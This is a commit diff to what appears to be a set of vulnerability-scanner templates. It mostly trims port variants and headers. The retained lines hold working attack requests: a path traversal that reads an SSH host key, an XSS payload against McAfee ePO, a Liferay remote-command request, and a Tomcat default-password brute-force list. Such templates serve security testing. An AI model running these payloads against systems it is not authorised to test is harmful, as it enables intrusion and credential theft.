fixes

2021-01-11 04:09:54 +05:30 · 2021-01-11 04:09:54 +05:30 · b5dd30abf5
parent b80ca7732d
commit b5dd30abf5
7 changed files with 12 additions and 38 deletions
--- a/cves/2020/CVE-2020-12116.yaml
+++ b/cves/2020/CVE-2020-12116.yaml
@ -17,12 +17,6 @@ requests:
        Accept: */*
        Connection: close

-      - |
-        GET / HTTP/1.1
-        Host: {{Hostname}}:8060
-        Accept: */*
-        Connection: close
-
      - |
        GET endpoint../../../../bin/.ssh_host_rsa_key HTTP/1.1
        Host: {{Hostname}}
@ -31,14 +25,6 @@ requests:
        Connection: close
        Referer: http://{{Hostname}}

-      - |
-        GET endpoint../../../../bin/.ssh_host_rsa_key HTTP/1.1
-        Host: {{Hostname}}:8060
-        Accept: */*
-        Cache-Control: max-age=0
-        Connection: close
-        Referer: http://{{Hostname}}:8060/
-
    extractors:
      - type: regex
        name: endpoint
--- a/cves/2020/CVE-2020-7318.yaml
+++ b/cves/2020/CVE-2020-7318.yaml
@ -14,16 +14,12 @@ info:
    - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/

 requests:
-  - payloads:
-      port:
-        - "80"
-        - "443"
-        - "8443"
-    raw:
+  - raw:
      - |
        GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1
-        Host: {{Hostname}}:§port§
+        Host: {{Hostname}}
        Connection: close
+
    matchers-condition: and
    matchers:
      - type: status
--- a/cves/2020/CVE-2020-7961.yaml
+++ b/cves/2020/CVE-2020-7961.yaml
@ -18,15 +18,12 @@ requests:
        - "systeminfo"  # Windows
        - "lsb_release -a"  # Linux
        - "sysctl kern.ostype"  # macOS
-      port:
-        - "80"
-        - "443"
-        - "8080"
+
    attack: sniper
    raw:
      - |
        POST /api/jsonws/invoke HTTP/1.1
-        Host: {{Hostname}}:§port§
+        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
        Content-Length: 4938
        Accept: */*
--- a/default-logins/apache/tomcat-manager-default.yaml
+++ b/default-logins/apache/tomcat-manager-default.yaml
@ -8,15 +8,15 @@ requests:

  - payloads:
      username:
-        - admin
+          - admin

      password:
-        - admin
-        - guest
-        - password
-        - test
-        - 12345
-        - 123456
+          - admin
+          - guest
+          - password
+          - test
+          - 12345
+          - 123456

    attack: clusterbomb  # Available options: sniper, pitchfork and clusterbomb

--- a/misconfiguration/aem-groovyconsole.yaml
+++ b/misconfiguration/aem-groovyconsole.yaml
@ -13,7 +13,6 @@ requests:
      - "{{BaseURL}}/groovyconsole"
    headers:
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-      Accept-Encoding: gzip, deflate
      Accept-Language: en-US,en;q=0.9,hi;q=0.8
      User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36

--- a/vulnerabilities/jenkins/jenkins-stack-trace.yaml
+++ b/vulnerabilities/jenkins/jenkins-stack-trace.yaml
@ -14,7 +14,6 @@ requests:

    headers:
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-      Accept-Encoding: gzip, deflate
      Accept-Language: en-US,en;q=0.9,hi;q=0.8
      User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36

--- a/vulnerabilities/jenkins/unauthenticated-jenkin-dashboard.yaml
+++ b/vulnerabilities/jenkins/unauthenticated-jenkin-dashboard.yaml
@ -9,9 +9,6 @@ requests:
  - method: GET
    path:
      - "{{BaseURL}}"
-      - "{{BaseURL}}:8080"
-      - "{{BaseURL}}:9090"
-      - "{{BaseURL}}:8888"

    matchers-condition: and
    matchers: